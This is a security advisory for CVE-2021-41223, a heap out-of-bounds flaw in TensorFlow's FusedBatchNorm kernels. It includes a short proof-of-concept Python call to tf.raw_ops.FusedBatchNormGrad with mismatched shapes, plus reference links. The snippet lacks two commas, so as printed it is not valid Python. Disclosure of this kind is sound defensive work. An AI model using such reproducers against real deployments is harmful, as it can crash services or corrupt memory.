CVE-2021-41223: Heap OOB in `FusedBatchNorm` kernels
(updated )
The implementation of FusedBatchNorm kernels is vulnerable to a heap OOB:
import tensorflow as tf
tf.raw_ops.FusedBatchNormGrad(
y_backprop=tf.constant([i for i in range(9)],shape=(1,1,3,3),dtype=tf.float32)
x=tf.constant([i for i in range(2)],shape=(1,1,1,2),dtype=tf.float32)
scale=[1,1],
reserve_space_1=[1,1],
reserve_space_2=[1,1,1],
epsilon=1.0,
data_format='NCHW',
is_training=True)
References
- github.com/advisories/GHSA-f54p-f6jp-4rhr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-632.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-830.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-415.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/aab9998916c2ffbd8f0592059fad352622f89cda
- github.com/tensorflow/tensorflow/security/advisories/GHSA-f54p-f6jp-4rhr
- nvd.nist.gov/vuln/detail/CVE-2021-41223
Detect and mitigate CVE-2021-41223 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →